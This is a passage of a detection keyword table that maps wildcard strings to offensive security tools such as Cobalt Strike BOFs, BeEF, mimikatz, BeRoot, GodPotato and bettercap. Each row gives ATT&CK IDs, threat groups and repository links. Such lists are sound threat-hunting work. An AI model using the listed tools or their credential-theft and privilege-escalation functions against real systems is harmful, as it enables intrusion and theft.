Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*BeaconObject.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconOutputStreamW*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*BeaconOutputWriter.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconPrintf(*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*BeaconPrintf*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconPrintToStreamW*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*BeaconSpawnTemporaryProcess*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*BeaconSpawnTemporaryProcess*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconTool -*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,0,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*BeaconTool/lib/sleep.jar*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*BeaconUseToken*,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,1,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*beef:beef*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind_tcp-stage.asm*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind_tcp-stager.asm*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind-stage*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind-stage.asm*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_bind-stager.asm*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef_test.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beefproject*,offensive_tool_keyword,beef,The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1210 - T1216 - T1207 - T1189 - T1190 - T1566,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*beef-xss*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Beelogger*,offensive_tool_keyword,BeeLogger,Keylogger generator. fake office and acrobat file and malicious executables generator,T1056 - T1105 - T1204 - T1106,TA0003 - TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/4w4k3/BeeLogger,1,1,N/A,N/A,10,902,343,2022-12-02T19:42:41Z,2017-02-17T15:34:39Z -*BeetleChunks/SpoolSploit*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*before-create-implant-callback*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*before-create-implant-io-bin*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*before-find-implant-chunks*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*BeichenDream/GodPotato*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*BeichenDream/SharpToken*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*benjamin@gentilkiwi.com*,offensive_tool_keyword,mimikatz,mimikatz default strings,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*BeRoot*,offensive_tool_keyword,BeRoot,BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.,T1068 - T1548 - T1574,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/AlessandroZ/BeRoot,1,0,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*beRoot.exe*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*beroot.py -*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,0,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*beRoot.zip*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*BeRoot-master*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*berzerk0*,offensive_tool_keyword,Github Username,github username known for repos on passwords exploitation and offensive tools,N/A,N/A,N/A,N/A,Credential Access,https://github.com/berzerk0,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BesoToken.exe list*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*BesoToken-master*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*best*phish her*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,0,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*bestcrypt2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*bestcryptve2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*BetterBackdoor*,offensive_tool_keyword,BetterBackdoor,A backdoor is a tool used to gain remote access to a machine.,T1071 - T1055 - T1059 - T1053,TA0002 - TA0006 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/thatcherclough/BetterBackdoor,1,1,N/A,N/A,3,275,89,2022-10-03T21:30:21Z,2019-07-29T14:45:24Z -*bettercap *,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*bettercap -iface eth0*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bettercap.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*bettercap_.deb*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*bettercap-master.zip*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z 